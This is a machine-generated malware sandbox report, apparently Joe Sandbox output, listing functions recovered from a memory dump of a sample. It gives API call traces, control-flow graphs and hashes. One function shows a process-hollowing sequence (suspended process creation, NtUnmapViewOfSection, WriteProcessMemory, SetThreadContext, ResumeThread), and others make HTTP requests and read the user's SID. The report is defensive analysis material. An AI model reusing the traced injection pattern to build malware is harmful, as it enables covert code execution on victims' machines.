                                                                        • API ID: AllocateHeap$_free
                                                                        • String ID:
                                                                        • API String ID: 1482568997-0
                                                                        • Opcode ID: feb5cebf922a56195c6e52ffdebcf452b87137afebcc93f7ff5f1a3ad440ced1
                                                                        • Instruction ID: de6e056ce77e9d15dd6cd08572cb1321142041043650dc7299382ec9eb279ce5
                                                                        • Opcode Fuzzy Hash: feb5cebf922a56195c6e52ffdebcf452b87137afebcc93f7ff5f1a3ad440ced1
                                                                        • Instruction Fuzzy Hash: 13F0F6322701B77ADB327E6AEC04FBF2BA89FA1570F11021AFE549A1C0DB20C50081A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9fc3c9f86e3ec65aea9a1b526994be93efd9134285bf46c12ed262d9b460d059
                                                                        • Instruction ID: e3fdba9b9fcbaca74cbc6bc068639ded21d4e0f2d59133d2d416e00e8e9b955d
                                                                        • Opcode Fuzzy Hash: 9fc3c9f86e3ec65aea9a1b526994be93efd9134285bf46c12ed262d9b460d059
                                                                        • Instruction Fuzzy Hash: 9EE0E5266655635BE632EABE78042FD17C05BB2738F114726E62CC60C8DFB4449186A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 613 1215e20-1215e3c 614 1215e64-1215e6a 613->614 615 1215e3e-1215e43 613->615 618 1215e70-1215e7b 614->618 619 1215f4e call 12169f0 614->619 616 1215e45 615->616 617 1215e47-1215e61 call 1219bb0 615->617 616->617 622 1215e84-1215e91 618->622 623 1215e7d-1215e82 618->623 625 1215f53-1215f58 call 1202150 619->625 627 1215e93-1215e98 622->627 628 1215e9a-1215e9f 622->628 626 1215ea2-1215eb6 623->626 629 1215eb8-1215ebd 626->629 630 1215edd-1215edf 626->630 627->626 628->626 629->625 632 1215ec3-1215ed0 call 1217403 629->632 633 1215ee1-1215ee2 call 1217403 630->633 634 1215eec 630->634 642 1215ed2-1215edb 632->642 643 1215f49 call 121bcdc 632->643 640 1215ee7-1215eea 633->640 638 1215eee-1215f11 call 121a270 634->638 646 1215f13-1215f1e 638->646 647 1215f3c-1215f46 638->647 640->638 642->638 643->619 648 1215f20-1215f2e 646->648 649 1215f32-1215f39 call 1217684 646->649 648->643 650 1215f30 648->650 649->647 650->649
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 01215F53
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID:
                                                                        • API String ID: 118556049-0
                                                                        • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction ID: 91f6c522de07e4b90ce218674ba38d799bfa5b5f43368a65cf3f4a57825ad542
                                                                        • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                        • Instruction Fuzzy Hash: 96311671A202019BD728DE7CD88057EBBE9EBB6220B2443BEEA25C7385D77099448791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 0120218E
                                                                          • Part of subcall function 01218483: RaiseException.KERNEL32(E06D7363,00000001,00000003,0120216C,?,?,?,0120216C,?,01236D1C), ref: 012184E3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise___std_exception_copy
                                                                        • String ID:
                                                                        • API String ID: 3109751735-0
                                                                        • Opcode ID: 278bf3adacdb062bd876796adc151054d6cdda24f30374ec1f8e470d13b65855
                                                                        • Instruction ID: 0913f46a386fe3af4a2a6cfbfb0f891f24f1a67862d06731b7be85af4b1ddeb7
                                                                        • Opcode Fuzzy Hash: 278bf3adacdb062bd876796adc151054d6cdda24f30374ec1f8e470d13b65855
                                                                        • Instruction Fuzzy Hash: AB01267587020EB7CB14FBE8EC058A9BBFCDE35110B508635FB14A6545FBB0E65486D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 675 121d4b1-121d4d7 call 121d287 678 121d530-121d533 675->678 679 121d4d9-121d4eb call 122268f 675->679 681 121d4f0-121d4f5 679->681 681->678 682 121d4f7-121d52f 681->682
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __wsopen_s
                                                                        • String ID:
                                                                        • API String ID: 3347428461-0
                                                                        • Opcode ID: c816fe522384515d78a8bce8c58903938f2fdd8c9b75a2791bf9c2640bf77320
                                                                        • Instruction ID: c856b37e325a0cf9aaaea186ea2bebd2cf9c2bbfd4c250a70b280123700bd13e
                                                                        • Opcode Fuzzy Hash: c816fe522384515d78a8bce8c58903938f2fdd8c9b75a2791bf9c2640bf77320
                                                                        • Instruction Fuzzy Hash: 9C111872A0420AAFCF05DF98E94499B7BF4EF48308F054069F805AB251E670EA11CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 683 121ed56-121ed63 call 121f925 685 121ed68-121ed73 683->685 686 121ed75-121ed77 685->686 687 121ed79-121ed81 685->687 688 121edc4-121edd0 call 121d653 686->688 687->688 689 121ed83-121ed87 687->689 691 121ed89-121edbe call 121e503 689->691 695 121edc0-121edc3 691->695 695->688
                                                                        APIs
                                                                          • Part of subcall function 0121F925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0121E0E6,00000001,00000364,00000006,000000FF,?,?,01218272,?), ref: 0121F966
                                                                        • _free.LIBCMT ref: 0121EDC5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction ID: e6cce40d5e06437805f8ce5a11ab076b964048550aaf45ad3f17050e05a01ade
                                                                        • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                        • Instruction Fuzzy Hash: 5E014972614317ABC322DF9DD88599AFBDCEB153B0F46062EE955A76C0E7706800C7A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction ID: 5ccbcd6c559340f788794dcca1b1903e29dd84b6743c177613d71b7c34c678a4
                                                                        • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                        • Instruction Fuzzy Hash: 63014F72C1115AFFCF11AFA89C01AFE7FF5AF18210F144565EA14E2190E6328A60DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0121E0E6,00000001,00000364,00000006,000000FF,?,?,01218272,?), ref: 0121F966
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 17c93dc7b6bcaf7160f85efe15a63fdd76acee559ad60ba961dd4153f3f644c5
                                                                        • Instruction ID: 0b8e6e231d3f932f40be920d5f272383c20d8dc10daef3d849d74fbf71a02874
                                                                        • Opcode Fuzzy Hash: 17c93dc7b6bcaf7160f85efe15a63fdd76acee559ad60ba961dd4153f3f644c5
                                                                        • Instruction Fuzzy Hash: D4F0E03157522676EB26FA3A9E0576B3BDAAF71770B054512DE34D718CCA30D8058AE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 2853472e2361ec52a51aa03c1e8eb1090aefc8a8d2ba3aa12aecd89856569c11
                                                                        • Instruction ID: 009f3dd964a8aeb248f6ef9926a8252406d147723f8c39315e5cc47fe3b1435d
                                                                        • Opcode Fuzzy Hash: 2853472e2361ec52a51aa03c1e8eb1090aefc8a8d2ba3aa12aecd89856569c11
                                                                        • Instruction Fuzzy Hash: 2BE0EC3517011BE7EA3195E99C0CB6B3AD8BB712B0F050120DE17971CCEB50D90082E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,01222758,?,?,00000000,?,01222758,00000000,0000000C), ref: 01222385
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: a3c97456a7442d61044b44ee0e5984786f464c97a18fe15ba67fba5d4a1cee71
                                                                        • Instruction ID: 9a868948283d05d4ba1effe70b67d3353e6939ceb785daa04b517665dbd3d133
                                                                        • Opcode Fuzzy Hash: a3c97456a7442d61044b44ee0e5984786f464c97a18fe15ba67fba5d4a1cee71
                                                                        • Instruction Fuzzy Hash: 58D06C3200010DBBDF228E84ED46EDA3FAAFB48714F114010FA1856020C732E821AB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012038E6
                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0120394B
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 01203964
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0120397F
                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 012039A3
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 012039BE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 012039C5
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 012039ED
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 01203A0E
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 01203A5A
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 01203A96
                                                                        • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 01203AB2
                                                                        • ResumeThread.KERNEL32(?,?,?,00000000), ref: 01203ABE
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 01203ACC
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01203AED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                        • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                        • API String ID: 4033543172-1522589568
                                                                        • Opcode ID: 162e977cc0f8ed410cc21e00a7790ecdd03804bca888ea367f439c9e49ce2208
                                                                        • Instruction ID: 5e03b8fe35b041eb9ad09129f07cb64fd09ce92141bc849e94e0e72dc25bb6ff
                                                                        • Opcode Fuzzy Hash: 162e977cc0f8ed410cc21e00a7790ecdd03804bca888ea367f439c9e49ce2208
                                                                        • Instruction Fuzzy Hash: FD515B70A40218AFEB319F54EC49FEAB7B4FF08701F100095F649AA281D776AA91DF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • InternetOpenW.WININET(01233F6C,00000000,00000000,00000000,00000000), ref: 0120871C
                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01208740
                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0120878A
                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 0120884A
                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 012088FC
                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 012089B0
                                                                        • InternetCloseHandle.WININET(?), ref: 012089D7
                                                                        • InternetCloseHandle.WININET(?), ref: 012089DF
                                                                        • InternetCloseHandle.WININET(?), ref: 012089E7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                        • String ID:
                                                                        • API String ID: 1354133546-0
                                                                        • Opcode ID: 125de1ceeee4ea77ec5bd4c96c44f8c7b07f62b962ea3d55de3696ddaed51579
                                                                        • Instruction ID: 23f09063a16689dee1b7e1d77c81031492cf36f01beba94f7a563715cc2b383d
                                                                        • Opcode Fuzzy Hash: 125de1ceeee4ea77ec5bd4c96c44f8c7b07f62b962ea3d55de3696ddaed51579
                                                                        • Instruction Fuzzy Hash: 23C108B0A201189BDB29DF28CC88BEE7F75EF51314F544298E608972D6DB719AC0CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 597776487-0
                                                                        • Opcode ID: 2e7c8f9af18087797003aa9ec1915aedbd9df9f34fd5d530a76ec749424f1ee9
                                                                        • Instruction ID: d8401c85d2b3a9aa9d957120ee5f6780ba3847f4208fef07cbd7a103a61ead38
                                                                        • Opcode Fuzzy Hash: 2e7c8f9af18087797003aa9ec1915aedbd9df9f34fd5d530a76ec749424f1ee9
                                                                        • Instruction Fuzzy Hash: 5FC15871A20266BFDB25DF6DD844ABEBBF9FF59350F1400A9D680DB241E7788A01CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01217B12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 25f4e96ee77054385f1220d7d2becf7e9c8b6bffbda62aecb891e765584f47f0
                                                                        • Instruction ID: 676cdb164cab37b333ba97a27a63464344f8fb54255762234395248366a0c38c
                                                                        • Opcode Fuzzy Hash: 25f4e96ee77054385f1220d7d2becf7e9c8b6bffbda62aecb891e765584f47f0
                                                                        • Instruction Fuzzy Hash: BD51A47191021ACFEF35CF69E5853AABBF0FB54314F248A69D602EB348D3B59941CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction ID: 56f3fd00e43d7eb07b5cbb1c92310f6be0fd7c7a496167948dd7d49eb5dd5655
                                                                        • Opcode Fuzzy Hash: 38dd18e236bff778ebfac104873e99183c47078571e48966eb6fb82665c9afe8
                                                                        • Instruction Fuzzy Hash: 6FE08C72961228EBCB15DF8CC9049AAF7ECEB48A40B150096B601D3100C270DE00C7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 01203132
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203147
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0120314A
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 01203158
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0120317B
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203186
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01203189
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 01203199
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0120319C
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 012031C6
                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 012031D9
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 012032D5
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032DE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012032E3
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032E6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012032ED
                                                                        • HeapFree.KERNEL32(00000000), ref: 012032F0
                                                                        • LocalFree.KERNEL32(00000000), ref: 012032F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                        • String ID:
                                                                        • API String ID: 3326663573-0
                                                                        • Opcode ID: a210dd5ff76c83f69fb08138c37c616d66a91136c91d433eaf652a7e758fcfd8
                                                                        • Instruction ID: b4897b50b151e1e523aefccfbd9e8b29dfb30bf42601be19eeb58d299d432365
                                                                        • Opcode Fuzzy Hash: a210dd5ff76c83f69fb08138c37c616d66a91136c91d433eaf652a7e758fcfd8
                                                                        • Instruction Fuzzy Hash: B97152B1D10249AFDB25DFA9DC88BEFBBB8FF48310F004529E905A7285DB749905CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 01221705
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212BB
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212CD
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212DF
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 012212F1
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221303
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221315
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221327
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221339
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122134B
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122135D
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 0122136F
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221381
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221393
                                                                        • _free.LIBCMT ref: 012216FA
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0122171C
                                                                        • _free.LIBCMT ref: 01221731
                                                                        • _free.LIBCMT ref: 0122173C
                                                                        • _free.LIBCMT ref: 0122175E
                                                                        • _free.LIBCMT ref: 01221771
                                                                        • _free.LIBCMT ref: 0122177F
